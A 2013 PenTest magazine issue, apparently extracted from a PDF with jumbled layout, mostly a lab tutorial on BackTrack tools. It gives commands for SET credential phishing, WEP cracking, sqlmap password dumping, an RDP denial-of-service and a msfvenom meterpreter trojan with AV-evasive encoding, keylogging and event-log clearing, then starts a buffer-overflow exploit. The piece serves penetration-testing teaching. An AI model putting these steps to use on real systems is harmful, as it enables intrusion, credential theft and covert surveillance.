OPEN 06/2013

You can also try to extend your lists to have more chances, but remember that such attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours for a word list attack. Anyway, if you find some associations, write them down and be ready to reuse it: users are used to use the same password for more than one service. You can start to write a file with user:password, you will use it on Hydra in the Password tab instead of users and passwords lists. When you discover a new service, you can first use Hydra with the new file created and then the lists of users and passwords. This will speed up your work. I hope you now have the user/password to access the FTP, SMB or, if you are lucky, the SSH, or RDP. This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerability all over the LAN. But what about if you can't find anything? Don’t worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploit some vulnerability, or ARP poissoning. There are so many options that the only limit is you and every discovery is the start for the next one. So when you open a new port, restart from the beginning, restart from sharpenning your axe.

Davide Peruzzi, OSCP certified, is a system administrator and freelance security consultant with about 10 years of experience in Information Technology. In the last years he focused on vulnerability assessments, penetration testing, InfoSec, and NetSec. He can be reached at [email protected]
OPEN 06/2013

Davide PerUZZi


Pentesting with BackTrack
Penetration testing, also known as Pentest, is a technique to evaluate the security of computers and networks by performing imitating attacks from external and internal threats. The pentesting process involves statical and dynamical analysis of a system/ network in order to reveal potential security issues resulting from improper configurations, hardware/software flaws. These attacks should be executed from the point of view of potential attackers.
uring this process, if security issues have brought to the foreground, pentesters tries to exploit them. Successful penetration results are presented to systems owners with recommendation to plug that loophole and all the operations to conduct to reproduce the attack. Warning Please consider that all materials of this Pentest magazine apparition are intended for educational purposes only. You must not use the skills and information obtain from this reading to attack in any way a system for which you don’t have specific authorization or ownership. Reproducing experiments that are present in this article on non-authorized systems is illegal in most of the world and you will ultimately backstop the consequences–including very high fine and jail.

Article comes from Pen Test Extra. Download the complete issue.


BackTrack comes from the merge of two other distributions named WHAX and Auditor Security Collection which already was focused on penetration testing. The latest release of BackTrack was published in August 2012 and is named BackTrack 5 R3. Here's a non-exhaustive list of backtrack tools categories: • • • • • • • • • • • • Information gathering; Vulnerability assessment; Exploitation tools; Privilege escalation; Maintaining access; Reverse Engineering; RFID tools; Stress testing; Forensics; Reporting tools; Services; Miscellaneous.

Quick overview of BackTrack

In the testing/penetration community, a leader emerges: BackTrack. Since its first release on the 5th of February 2005 by Mati Aharoni, Devon Kearns and Offensive Security; BackTrack has become a large, stable, and well known distribution for penetration testing. BackTrack is a Debian GNU/Linux based distribution built for specific purposes: digital forensics and penetration testing.
OPEN 06/2013

Installation and Configuration

In order to follow our step-by-step tutorials and hands-on recipes, you must have an access to three different virtual machines: one with BackTrack, one with Windows 7 and later with Windows XP. We consider that you have a brand new installation of BackTrack. If not, you can download the lat

Page 18

est version following this link In order to be comfortable, you’ll need to create a partition of, at least,16 GB. After the end of the installation, BackTrack will reboot and you’ll be able to log as root user (bt login: root/Password: toor). A prompt will appear and in order to launch the GUI, type startx. If you want to try this experiment by yourself, you’ll need to purchase Windows 7. Here is an advice: use a hypervisor like VirtualBox because it’s easier to install an OS and it avoids you to create a native partition on your computer; you will gain some precious time! In my case, I run the two OS on the same laptop using Oracle VirtualBox (see Figure 1). After the installation, we must set up the network parameters because they must communicate together through the network. For Windows, just click on the two little screens on the container of the operating system (on the bottom right corner). Then click on 'Network Adapters' and set up the adapter in 'Bridge Adapter' rather than 'NAT'. In my case, the name of the bridge adapter is 'en0: Ethernet' because I use this device to be able to contact the other ma-

chine (and the Internet). Repeat this step for BackTrack (see Figure 2). Now, it’s time to check if the two machines can see each other: launch a terminal on the two VM and exec the command ipconfig on Windows and ifconfig on BackTrack. Note: you must probably restart the networking daemon, otherwise the new configuration won’t take place:
/etc/init.d/networking restart

Figure 3. Ping command in BT terminal

Figure 1. Windows 7 and BackTrack 5r3 side by side

Figure 2. Network configuration of Windows 7 and BackTrack 5
OPEN 06/2013 Page 19

You will see the IP address of each VM. Then execute a ping command on BackTrack using the IP address of the Windows VM (see Figure 3). In my case, the IP address of my Windows is but it will be different for you:

Figure 4. Social Engineering tool

A ping is a special network packet called ICMP request that sends an echo packet and wait for an echo reply.

Social Engineering Toolkit

In this part we want to show how to use the Social Engineering Toolkit. First, to resume what are social engineering attacks. It is the art of manipulating people into performing actions or divulging confidential information. The Social Engineering Toolkit (SET) has appeared in BackTrack 4 and it was written by David Kennedy. SET is an open-source Python tool aimed at penetration testing around Social-Engineering. You can find more information about SET on the home page


In this case we use SET to create a fake website to harvest credentials. • Run Social Engineering Toolkit using the BackTrack menu (see Figure 4). • Make sure that Metasploit and SET are up to date using options 4 and 5 in the SET terminal menu. • Select number 1 'Social Engineering Attacks'. • Select Website Attack Vectors (see Figure 5). • In the first part we use Credential Harvester Attack Method (option 3). • At this moment SET offers three options. Use a predefined template as Facebook, Gmail, etc. Clone an existing site or import a custom HTML file. We use the first op tion to make the tutorial easier to follow. • Now, we have the choice to specify a local IP address or external IP address. In this tutorial we use a local address
Page 20

Figure 5. Website Attack vector

Figure 6. Know your IP address
OPEN 06/2013

• • • •

(to know your IP address, use ifconfig command in terminal menu; see Figure 6). Select Gmail in the next menu and press Enter. Now open Firefox at localhost:80 (see Figure 7). When you use the form to authenticate the user on Gmail, you can see all information about the user in the SET terminal (see Figure 8). The process generated two reports html and xml files in /pentest/exploits/set/reports/ (see Figure 9).

How to protect against social engineering?

This type of attack is generally used by a hacker in the email. To prevent social engineering attacks, it’s really important to teach people about phishing, using https, unmasking spam, and verifying the identity of the speaker. 2 Wireless and Bluetooth Wireless WEP 802.11 Security

To test the security of your wireless network, we need the aircrack-ng package (formerly aircrack). This package exists for Windows and Linux and you can find it at BackTrack is more specialized in security, and the package is included with all drivers for wifi-cards. Aircrack is software to crack WEP 802.11. He uses the attack named Fluhrer-Mantin-Shamir (FMS) and other attacks created by Korek. When enough packets are captured, Aircrack could instantly find the wireless key. The aircrack package contains several programs and the three main areas: • Airodump-ng: software that makes packet cap ture, scans the networks, and keeps the packets that we use to decrypt the key. • Aireplay-ng: the main function about this software is sending packets to stimulate the network and capture more packets. • Aircrack-ng: is used for cracking the key-pass, it uses packets capture through air-pump. For confidentiality the names of all networks about ESSID (Extended Service Set Identifier) were hidden. Also the Mac address BSSID (Basic Service Set Identifier) has been partially censored. • Start by checking if your wireless card is allowed to inject packets: http://www.aircrack-ng. org/doku.php?id=compatible_cards

Figure 7. Gmail at localhost:80

Figure 9. Reports

Figure 8. Information about the user
OPEN 06/2013

Figure 10. Airmon-ng
Page 21

• Open the terminal and use the command 'airmon-ng to list the cards available (see Figure 10). • The MAC address is the ID of your wireless card. When a hacker attacks a wireless he usually changes it, to hide his identity. First, we disable the wireless card, and then we change our MAC address with macchanger command (see Figure 11). Normally, you work on your network and this step is not really important but it’s important to understand the technique. • Now we use airodump-ng wlan0 to scan the networks. Airodump scans the entire channel and show all AP (Access Point) available (see Figure 12). The PWR column correspond to signal power, if airodump has a problem to define it if displays ‘-1’. The Beacon column corresponds to a frame transmitted periodically to announce the presence of a Wireless LAN. It is not important to crack a WEP key. The column ‘CH’ indicates the channel of the AP. The column ‘#Data’ is the key to cracking the Wireless security with WEP. The principle of using Aircrack to crack the WEP key is catching initialization vector (IV). IVs can be found during the exchange of data. The conclusion is simply more data = more IVs exchange = more simple to crack a WEP key. • Use CTRL+C to stop scanning. • For the best performance and to scan only the target network, use the next command to filter its BSSID (see Figure 13):
Airodump-ng -c (channel) -w (filename) --bssid (BSSID) (interface)

Where: • Channel corresponds to the target channel; • Filename is the name of your trace file; • BSSID corresponds to the target BSSID; • Interface is your interface. • This step is not essential, it tests if the access point has a MAC address filter, but the protocol is not reliable and if you have an error message or timeout, don’t panic. Open a new tab in the terminal console and enter this command (see Figure 14):
aireplay-ng -1 0 -a (BSSID) -h 00:11:33:44:55 -e (ESSID) (interface)

Where: • BSSID corresponds to the target BSSID; • ESSID corresponds to the target ESSID; • Interface is your interface. • Now we want to inject traffic to increase data on the network and facilitate WEP cracking. We must have 100 000 IVs to cracking the WEP key, and the best attack to generate IVs is the 're-injection ARP attacks' specified with the number 3. Hit the following command to force some traffic (see Figure 15):
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

Figure 14. Aireplay command

Figure 11. Change your mac address Figure 15. Aireplay

Figure 12. Airodump Figure 13. Airodump
OPEN 06/2013

Figure 16. Key found
Page 22

Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage By Lance Cleghorn BackTrack 4: Target Scoping By Shakeel Ali, Tedi Heriyanto TOOLS Metasploit Primer By George Karpouzas Metasploit for Exploits Developement: The Tools Inside the Framework By Guglielmo Scaiola Hacking Wireless in 2013 By Terrance Stachowski Automating Exploitation with MSFCLI By Justin Hutchens Nikto: How to Launch Mutation Technique By Ankhorus MsfPayload & MsfEncode By Pankaj Moolrajani and Hitesh Choudhary Compromising Passwords With the Next Generation of Backtrack: Kali Linux By Joseph Muniz PenTempest on Wordpress By Massimiliano Sembiante SCENARIOS Pentesting with Backtrack By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme Guide to BackTrack 5: Attacking the Client By Vivek Ramachandran Taking Over an Active Directory By Gilad Ofir MS Internet Explorer Sam ID Property Remote Code Execution Vulnerability By Praveen Parihar


INTRODUCTION TO BACKTRACK BackTrack for Pentesting? By Lloyd Wilke BUILDING YOUR LAB From The Beginning: Building an SQLi Lab By Guglielmo Scaiola How to Set Up a Software Hacking Lab Part 1, 2, 3 By Steven Wierckx MULTIPHASE TESTING Sharpen your Axe with BackTrack By Davide Peruzzi

Where: • BSSID corresponds to the target BSSID; After this command normally the number of #Data in your first command line is increasing step by step. • Finally, to crack the wireless key network we open a new terminal and we use this command to start aircrack-ng:
aircrack-ng -b (BSSID) (filename-01.cap)

• Now we want to scan and fingerprint a Blue tooth device. Fingerprinting is a term we use for profiling a device, and to do this BackTrack has a collection of tools called Bluez. Bluez is a standard Bluetooth package for Linux. In this part we use hcitool to scan devices that are broadcasting. We scan using hcitool with the following command (see Figure 18):

Where: • BSSID corresponds to the target BSSID, • filename-01.cap is the name specified during step 6, followed with -01.cap; corresponds to the first tracefile. Aircrack continue to update the IVs number captured by airodump and generated by airplay. • After a few minutes, WEP key should appear by itself if the crack works (see Figure 16). The network has changed the key, but you should know because you are the AP owner. The captured file is corrupted.

Figure 17. hciconfig -a

How to protect against Wi-Fi penetration?

To prevent this kind of attack you can change your wireless key encryption to WPA2 encryption. If this does not cause accessibility problems, use complex password (numeral, letter, uppercase letter, symbol) to increase cracking complexity.

Figure 18. hcitool scan

Bluetooth security

There are various hacks and a lot of software already available on the different website which help hackers to hack any cell phone and multimedia phones with Bluetooth. But actually a lot of manufacturers have close security vulnerabilities. In this article, we have outlined only some Bluetooth hacking software and presented how to set them. • The first time we set up our Bluetooth equipment, we open a terminal and take this command:
hciconfig hci0 up

Where: hci0 corresponds to your Bluetooth interface. • Now you should have your adapter up and working. To verify that all is 'OK' hit this command: hciconfig -a (Figure 17).
OPEN 06/2013

Figure 19. sdptool

Page 24

Listing 1. HCI daemon configuration file
autoinit yes; passkey "1234"; security auto; name "bt1"; iscan enable; pscan enable; lm accept,master; lp rswitch,hold,sniff,park; auth enable; encrypt enable;

• Now, we search our HCI daemon configuration file (generally in /etc/bluetooth/hcid.conf) and replace all the lines from Listing 1. • We restart our Bluetooth device with bash / etc/rc.d/rc.bluetooth restart • We can now set up our devices. First one is RFCOMM0 and is on channel 3 DUN Dial up, second is RFCOMM1 and is on channel 6 FTP, and the third is RFCOMM2 and is on channel 7 OBEX push.
mknod -m 666 /dev/rfcomm0 c 216 3 mknod -m 666 /dev/rfcomm1 c 216 6 mknod -m 666 /dev/rfcomm2 c 216 7

• It’s time to connect it with sdptool (see Figure 20).
sdptool add --channel=3 DUN sdptool add --channel=7 OPUSH sdptool add --channel=6 FTP

Figure 20. sdptool
hcitool scan

• Stop scanning when it shows your device and note its MAC address. Now, we use sdptool to browse our device for open channels and tell us what services are available on which channels (see Figure 19).
sdptool browse Mac_address

At this time, we have scanned Bluetooth broadcasting, identified what is the channel/services, and configured our network card. Normally you are ready to attack your mobile. In this article, as we have previously said, we do not present attacks because our device is not vulnerable. But if you would like to know more about it, you can search Bluebugger and Bluesnarfer attacks.

Prevent Website Attacks

Scanning Joomla CMS with Joomscan

Where: Mac _ address is your mobile MAC address.

Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. The principle is simple: you can download the archive on the offi-

Figure 21. CMS Vulnerability
OPEN 06/2013 Page 25

cial Joomla website and after the installation, you have set up your website and can start publishing content (follow the documentation to know how to install Joomla http:// To show how important it is to stay up-to-date CMS, we voluntarily use an old version of Joomla (download Joomla_1.5.26). In this case, we have hosted an Apache server and mysql using Lamp Joomla is available on our local network at On the other side we use the last version of BackTrack 5R3 to scan vulnerabilities of Joomla 1.5.26. • Start BackTrack • Open the jomscan tools (you will find them in BackTrack menu; see Figure 21). • To run the joomscan script use this command (see Figure 22):
./ –u (String)

SQL injection with sqlmap

SQL injection is a code injection technique that exploits security vulnerability in an application’s software. SQL injection is mostly known as an attack vector for a website but can be used to attack any type of SQL database. If you would like to know more about SQL injecting, read this great website: http://www.unixwiz. net/techtips/sql-injection.html.

Where: STRING corresponds to our Joomla URL website. In this example the website is placed at • After few seconds, we can see apache and Joomla version analyzed by joomscan and all included website modules. As we can see, the mentioned version is not the same, here the range 1.5.12-1.5.14. We can explain fail by the techniques used by joomscan to analyze the version. Indeed, joomscan analyzed the header in the .ini file included in Joomla and sometimes is not up-todate. However, the analysis can help you understand security in the CMS world. • After a few minutes, Joomscan has analyzed all vulnerabilities on your website and thought us if our version has been concerned (see Figure 23). • Now we can follow the 'Exploit' instruction to throw an exploit on our Joomla website. • If you would like to prevent attacks on your Joomla website, you can hit this command: ./ Joomscan. pl defense and follow the instructions to make your CMS more secure.

Figure 22. Running Joomscan

How to protect against Joomla vulnerabilities?

The best technique to prevent attacks on CMS is to keep your version up-to-date and regularly use joomscan when you install a new module.
OPEN 06/2013

Figure 23. Vulnerability on Joomla

Page 26

SQLMAP is an automatic SQL injection and database takeover tool and it included in the last version of BackTrack. In this section we analyze a vulnerable PHP script; we use SQLMAP and extract database information. • Download the sample website (index.php and db.sql); it is vulnerable to SQL injection. • To install the sample we simply put index.php in our localhost directory and we create a new database named sql _ injection. Then, we import the db.sql file to the database. • When everything is ok, we open a browser and verify if the site is up (see Figure 24).

• • • •

• name=ben is the first GET argument used in mysql query and corresponds to the user name; • Password = is the second GET argument used in mysql query. Now, we start sqlmap in the BackTrack menu (see Figure 25). Then we run the command pictured in Figure 26. After a few minutes, sqlmap shows vulnerability in the parameter name and display all databases (see Figures 27, 28). Now we can execute the SQL injection. To perform this exploit, execute the following command (see Figure 29):

Python ./Sqlmap. py -u sql/ index.php?name=ben -D sql_injection -T user --columns sql _ injection corresponds to the database named sql_injection created in step 2; -T user is used to select the table user in the sql_injection database; --Columns is the argument used to take columns off the table. • Sqlmap reveal 3 columns: id, name and password (see Figure 30). Now, we execute a query to get the password simply with a username (see Figure 31, 32). -D


Where: • corresponds to apache server IP address; • /testsql corresponds to the path where we put the website: index.php;

The best technique to prevent SQL injection is to protect your mysql query with mysql_real_escape_ string() or to use PDO library http://
Figure 26. Run SQLMAP

How to protect against SQL Injection?

Figure 24. SQL Injection

Figure 27. SQL vulnerabilities

Figure 25. SQLMAP
OPEN 06/2013

Figure 28. SQL vulnerabilities
Page 27

Figure 29. SQLMAP command sample

Figure 30. SQL Map results

Vulnerabilities exploit on Win7

In this case study, we will learn how to penetrate Microsoft Windows 7. Nowadays, companies are still struggling to recognize the overwhelming benefits of the latest release of Microsoft. Indeed, proceeding to a worldwide migration led to incommensurable direct investments, licenses, and long-term commitment formation. Considering these wellknown facts, we will base our experiments on Windows 7 instead of Windows 8. In order to perform this case study, we will use the Metasploit framework. Metasploit is the perfect toolkit for pentesting. What will you learn: • How to use Nessus and Metasploit; • Exploit DOS on Windows 7; • How to create a Trojan for Windows 7. Now, we will focus on Nessus. It is a vulnerability scanner that allows you to scan a network and discover some flaws in the operating system services’ misconfiguration. Even if there are some packages provided by BackTrack, you need to download the latest version of Nessus: • In the terminal, write apt-get install Nessus; • Then, you must activate your Nessus version following this link: products/nessus/nessus-homefeed; • You will receive your key by email. Copy this key and write the command below: /opt/ the key. If everything is ok, you’ll see this message: 'Your activation code has been registered properly – thank you';
Figure 31. SQLMAP dump command
OPEN 06/2013

• After that, you need to create a user for Nessus: /opt/nessus/sbin/nessus-adduser; • Choose a login and password, and say yes when Nessus asks you if you want to create an 'admin' user (see Figure 33); • Finally, you need to start the Nessus daemon entering /etc/init.d/nessusd start; • Nessus gives you the opportunity to use a GUI on a web browser. Run Firefox and go to https://localhost:8834/. The connection requires https because all the communication is encrypted using SSL/TLS. Now everything is set up to have some pentest fun on Windows 7.

Exploit 1: DOS on Windows 7

For this first exploit, we want to create a denial of service on a remote host. A DOS happens when a malicious intruder wants to stop a specific process (or all process) on a remote computer or server. This type of attack can target email services or websites, and are performed by using flooding or a flaw in a program or service. In our case, we will crash the remote computer by exploiting a flaw in the Remote Desktop Protocol. RDP is very useful

Figure 32. SQLMAP Dump results

nessus/bin/nessus-fetch --register xxxxxxxx-xxxx-xxxx-xxxx where xxxx represents

Figure 33. Run nessus as Admin

Page 28

to take control of a user session remotely. For instance, an administrator can help a user to solve a problem or you can help your mother set up her new printer. By default, RDP uses the port 3389. Since we have a fresh Windows 7 installation, the first thing to do is to activate this service. This is very easy: click the start button, right click on Computer, Properties. On the left panel, click Remote Settings and then click the radio button 'Allow connections from computers running any versions of Remote Desktop'. This exploit doesn’t work for the third item, because it uses NLA authentication mode that is more secure than the second one. Before we start, let’s take a look at our roadmap. First, we will perform a kind of pre attack by scanning our entire network and see what hosts are connected. Then, we will choose a target, find some flaw using Nessus, and then we will be able to perform the crash of the system using the Metasploit framework. Nmap is a tool designed to scan a range of addresses or a specific target. We want to discover if there are any Windows in our network. In order to discover the entire host on this network, type nmap -sP (see Figure 34). The -sP parameter means that we only want to show alive hosts.

There are some hosts connected to the network, but no Windows 7. However, there are a few unknown hosts. So we can gather more information about them by writing nmap -O ip_address where ip_ address represents the IP of the target to scan. Let’s try with nmap -O (see Figure 35). The result indicates that a Windows 7 is online on the network! Moreover, nmap has detected some open ports. It’s important to know if there is a possible way to hack our Windows. Here comes Nessus. Once you are logged, we will create a new scan (under the Scans tab and clicking add button). We name our Scan ‘Win7 Scan’, and we set the policy to ‘Internal Network Scan’. Under the ‘Scan targets’ box, you can choose a range of IP addresses (for example but we want to target a specific host, so we need to use the one provided by nmap: (see Figure 36). Launch the scan. After a while, you will see the results (see Figure 37). According to the scan, there are two potential high threats for our Windows. Let’s go deeper. By clicking the first result (SVC Name msrdp on port 3389), you’ll learn a lot of things about this vulnerability, for instance a description, the solution to protect against it if the flaw is exploitable and the Common Vulnerability ID (CVE). The Metasploit website provides a database for auxiliary and exploit modules (www.metasploit. com/modules/). By entering the right CVE (CVE-2012-0002 in our case) on the field, we discover that there are

Figure 34. nmap’s results

Figure 36. Nessus GUI

Figure 35. Nmap’s results
OPEN 06/2013

Figure 37. Nessus results
Page 29

exploits for this kind of vulnerability. By clicking the link 'MS12-020 Microsoft Remote Desktop', Metasploit gives you all the information to exploit this vulnerability (see Figure 38). Now it’s time to attack our Windows. On BT5, the first thing to do is to launch the msfconsole. It’s a popular interface of Metasploit. It provides an 'all-in-console' and allows you to access a wide range of options. Exec msfconsole. A msf prompt will appear. Then, we must set the good payload. According to the Metasploit website, we will use ms12_020_maxchannelids (see Figure 39) :
use auxiliary/dos/Windows/rdp/ms12_020_maxchannelids

When you want to discover some flaws on a remote system, repeat these three steps – very efficient and pretty easy.

Exploit 2: Creation of a Trojan to get access to a remote computer

If you type show options, you’ll see all the requirements needed by the payload to perform the attack. You need to set the RHOST corresponding to the remote host, out Windows 7. Write set RHOST on the console. The show options command proves to us that the target is correctly set (according to the figure below). Everything we need to perform in this penetration is ok, so the last thing to do is launch the exploit! On the BackTrack5 Terminal, just write exploit and see the result on your Windows (see Figure 41)! As you can see, the Windows have just crashed (see Figure 41)! BackTrack 5 shows us that the payload has worked successfully ( seems down) (see Figure 42)!

The first exploit was fun, but now we want to have complete access to the remote host! In this scenario, we will use Social Engineering to send a malicious program to a user running Windows 7. Here’s the roadmap of our experiment: First, we will use msfvenom to create our payload to send to the target. Second, we will create a handler in order to await a possible response of our target. Finally, we will perform some actions on the remote host. Step 1: Generation of the payload We will use msfvenom which is a combination of msfpayload and msfencode. Msfpayload is a tool specially designed to generate all the shellcode available in Metapsloit. Msfencode is a little tool that can help with encoding. We will use a reflective DLL injection: it’s a technique employed to perform the loading of a library

Figure 40. Show option command

Figure 38. Search for exploit

Figure 41. Windows 7 Crash

Figure 39. Use auxiliary command
OPEN 06/2013

Figure 42. Module Execution complete
Page 30

Is your Car Unhackable? Build your Own Pentesting Workshop
Your job is to find vulnerabilities and to patch them. Amounts of work, various projects, pending contracts, innumerous commitments. Still, it seems that you can shut your laptop and get unplugged. Drive home, go shopping, take your family to cinema. Yes, you can. But you do not drive a car any more. You sit in a device, a totally and easily hackable set of applications. Have you thought about that? Has anyone bothered to pentest your car? Are the super secure automating driving and parking systems really secure? Web & Mobile Applications Pentesting Toolkit What tools to use for pentesting web and mobile applications? Which are the newest? Which are the best? Complete your own pentesting workshop for every operating system. Inside you will find: - how to use SQLMap? Do you know its full possibilities? - the USB Rubber Ducky – The Penetration Tester’s USB - how to use the new deft8 in pentesting and much more! Check out the newest trends and releases in penetration testing world together with PentTest Magazine!

Secret Pentesting Techniques

Cloud Pentesting

Everybody has a best friend. You certainly know that feeling when he or she tells you something that nobody else is aware of. Something you cannot tell anybody. Something exclusive, for your ears only. Something that makes you unique, some might say better than others. Today, PenTest magazine becomes your best friend… We will reveal the deepest secrets of pentesting.

This time we are preparing for you a magazine devoted to Cloud Pentesting. We have already written about it, but due to with your suggestions and needs, we decided to return to this subject in order to update all the information on it, collect new experiences, share with you professional tips and advice. Also, there’s a growing interest in this subject and our cooperation with SC Magazine who’s organizing eConference on cloud security was another crucial motivating idea. Do you want to see what’s new in Cloud Pentesting? Check how to protect your Cloud better basing on the experiences of others! This issue will be published in a month, but now you can buy it cheaper! PREORDER CLOUD PENTESTING! Now it costs 15$ only! Do not hesitate!

Build your Own Pentesting Company

Analyze and Report

What are perspectives of small pentesting companies? Is it possible to be one-man pentesting company? On which markets new companies should look for their chances? What are the legal issues when building/managing a pentesting company? What hardware/software should you invest in? What kind of people should you look for and where to find them? Now is the time to ask these questions and to get answers for them! Since in the 1st issue our authors shared with you their thoughts on how to begin a pentester career, in both, the 1st and the 2nd issue you could read about Nessus, BackTrack, SHODAN, Owasp A10, Social Engineering, IDS, AD and more, and since the 3rd issue will be devoted to tools and techinques too, you should definitely read Build your own Pentesting Company afterwards and learn how to build your market position!

Have you ever done an astounding job but your employer was not satisfied with it? Maybe you had some problems with preparing a report after a conducted pentest? Even the greatest pentesters have this kind of difficulties and they struggle immensely to find a solution. In this upcoming issue we will exhaustively explain how pentester should prepare a paper after an executed test. You will learn things which will definitely please your employer and he will not complain ever again. If you are an employer yourself, you might be also interested in this number. We will describe a lot of important facts which you must know to hire an amazing pentester.

into a host process, here the TCP. TCP belong to the Internet protocol suite and can perform a reliable and error control connection between two hosts. In the BackTrack terminal, write msfvenom -p Windows/meterpreter/reverse_tcp -o in order to view all the options you need to fill for generating the Trojan wellm (see Figure 43). You need to provide some information like your local IP address (LHOST). If you can’t remember it, type ifconfig on the terminal. In my case, it’s We will also change the listening port (LPORT) to 443, because a firewall or a router is more prone to accept this kind of stream. In order to generate and output the malicious file, write this command:
msfvenom -p Windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST= LPORT=443 -f exe > hot_girls_screensaver.exe

means that the output format will be an executable file; hot _ girls _ screensaver.exe is the name of the output (we decided to choose an attractive filename to get a better result; see Figure 44).
-f exe

Now, with this executable you can gain access to a remote computer by reversing the connection! If you list the directory (ls), you will see our Trojan. Then, you must send this exe to your Windows 7. In real life, to perform such a thing, you’ll probably need to use some social engineering tricks in order to force a user downloading your trojan. But don’t forget that’s illegal. Step 2: Wait for a remote execution of the payload In BT5, you must use the generic payload handler. This module lets you use all the features from the payload launch outside the framework. Write use exploit/multi/handler and according to our purpose, we need to set a reverse_tcp payload. It’s necessary to execute the command below (see Figure 45):
set payload Windows/meterpreter/reverse_tcp show options

Here are some explanations:
x86/shikata _ ga _ nai is an encoder which performs some permutation and substitution through the block in order to bypass a spam filter or an antivirus; -i 5 encode the content of the payload 5 times; -b ‘\x00’ avoid this character on the payload (NULL) in order to avoid the premature end of a code; -e

As it is shown on the screenshot, we need to configure the local host and the local port:
set LHOST set LPORT 443

Figure 43. msfvenom command

Then we can run the reverse handler by typing exploit (see Figure 46). Now, Metasploit is waiting for an incoming connection from a potential victim. In real life, you don’t know when a potential user will execute the malicious file, so be patient!

Figure 44. msfvenom results

Figure 46. Executing the reverse handler

Figure 45. PayLoad configuration
OPEN 06/2013

Figure 47. Trojan execution results
Page 32

Step 3: Let’s execute the Trojan. It’s time to double click the exe file in our Windows 7 (see Figure 47). Once the remote user launches the payload, a meterpreter prompt appears; that means that you have complete access to the remote host! Meterpreter provides some powerful tools for executing remote code. When you hit the key, all the activities that you are able to perform are listed. First of all, we must know who is running our payload. Thus, we must enter the command sysinfo (see Figure 48). As we can see on the screenshot, all the information about the remote hosts are displayed! Let’s go further and see how many processes are running on the remote host. Type ps (see Figure 49). You will see the entire process list. Now the user probably thinks that your screensaver doesn’t work. If he is skilled, he probably wants to kill the process of the Trojan. In order to stay connected, a smart thing to do is migrating our meterpreter process to another one. We will choose explorer.exe because it’s a generic process managing the GUI of Windows. To do this, locate the process identifier (PID) of explorer.exe and type migrate pid_ number where pid_number represents the pid on the remote host (see Figure 50). In our case, the PID is 908. The user can kill the process hot_girls_screensaver.exe, it’s no big deal because we are now running our session on explorer.exe! Moreover, if the user didn’t kill the process, do it yourself. Again, locate the screensaver.exe PID using ps and locate it. Then execute

where pid_hot_ PID of this process. As you can see, you are still connected! Now focus on the user itself: we can view what the he is doing by writing the command screenshot or how long he is idle by typing idle time. If the user is active, it will be interesting to know what he is typing. To perform such a thing, we must launch the meterpreter keylogger by entering the keyscan_ start command (see Figure 51). All of the keys pressed will be recorded and if we want to read what the remote user is typing, we need to run the keyscan_dump command (see Figure 52). To stop the key logger, run keyscan_stop. shell command lets you have access to a remote Windows prompt (see Figure 53). Our attack must be secret, so in order to stay undetected, we must type clearev. The entire event list that we generate during our intrusion will disappear from the Windows eventlogging panel.
kill pid_hot_girls_screensaver girls_screensaver represent the

How to protect against these?

As you can see, these attacks are really easy to do. Concerning the RDP exploit, if you use it on your home or at work, try to use NLA authentication mode because it’s more secure. Network Level Authentication employs user’s credentials and provides accountability: you know who is doing what in which circumstances. Moreover, according to the TechNet Microsoft website, NLA requires fewer remote computer resources when challenging than the other method. It can help to reduce the

Figure 48. Meterpreter terminal

Figure 50. Migrate pid_number

Figure 51. keyscan command

Figure 52. keyscan_dump command

Figure 49. Remote system running processes
OPEN 06/2013

Figure 53. Access to the remote prompt
Page 33

risk of a DOS attack. Don’t forget to update your OS when a new one is available. The best mode is to turn on the auto update. This link gives you the entire step to configure this: thanks.aspx?ln=en&&thankspage=5

• MiniShare (http://mathieu-nayrolles/pentestmag/victim/ MiniShare is a free web server for Windows XP to share files. • IP: The attacker system is BackTrack 5 r3 with: • • • • Perl interpreter; Python interpreter; Metasploit 3.x; IP:

Concerning the Trojan, the best practice is to educate your mates and colleagues. In effect, the whole security of a system or network depends on the weakest element of the chain. Most of the time, the problem is located between the keyboard and the chair! It’s also important to install an antivirus on the computer and keep it up-to-date. Microsoft provides Windows Defender but there is a lot of good software on the market – for instance Avast. But in my opinion – and I insist – you really need to talk about this subject matter around you. The hackers and the market antivirus industries lead a war with no mercy. It’s like the cat and mouse game and an antivirus works in reactive mode: that means that the software contains a database of the well-known vulnerabilities (signatures) and can’t fight against software, code, viruses, etc. that it doesn’t recognize.

Detect buffer overflow possibility
On the victim system: • Launch OLLYDBG and then File>Open>Mini Share.exe (The default installation path is C:\ Programs Files\MiniShare\MiniShare.exe (see Figure 54).

Buffer Overflow

In this section; we will learn about an exploit related to Buffer Overflow techniques. A buffer overflow may appear when a program attempts to store in RAM more data than it can actually do. Moreover, buffers are created to hold a fixed amount of data and will corrupt or overwrite adjacent buffer while overflowed. Even though buffer overflow can appear while programming; in this section we will try to exploit poor programmed program by overflowing its buffer with executable code of our choice. What you will learn: • To detect an overflow possibility in a program; • To build a python script to create a buffer overflow; • To exploit the buffer overflow with a payload.

Figure 54. OllyDBG GUI


The target system is a Windows XP SP2 with: • Ollydbg (http://mathieu-nayrolles/pentestmag/ victim/ OllyDbg is an assembler level analyzing debugger for Windows XP. We will use this software to detect buffer overflow possibilities.
OPEN 06/2013

Figure 55. Find a JMP ESP operation

Page 34

The interface is organized as follows: • Upper-left: CPU view; • Lower-left: Memory dump; • Upper-right: Register; • Lower-right: Stack. Now, you can hit F9 to let MiniShare run. • In the view menu select 'Executable Menu', then select Shell32 at the bottom of the list and press enter. You can now search for JMP ESP operation using [CTRL+F]. A JMP ESP operation proceeds to a jump to the ESP point (see Figure 55). Since we will have to use this address in a python script, that we will build later, we want to avoid any special character such as: \x00 (zero byte), \x0a (line feed) and \x0d (carriage return). Use CTRL+L in order to continue your research of the perfect JMP ESP operation. In my case, I found the holy graal at 7CA58265. Create a buffer overflow targeting MiniShare A known vulnerability of MiniShare (that can be found at let the sender overflow the vulnerable server with a simple HTTP GET looking like:
GET HTTP/1.1 \r\n\r\n

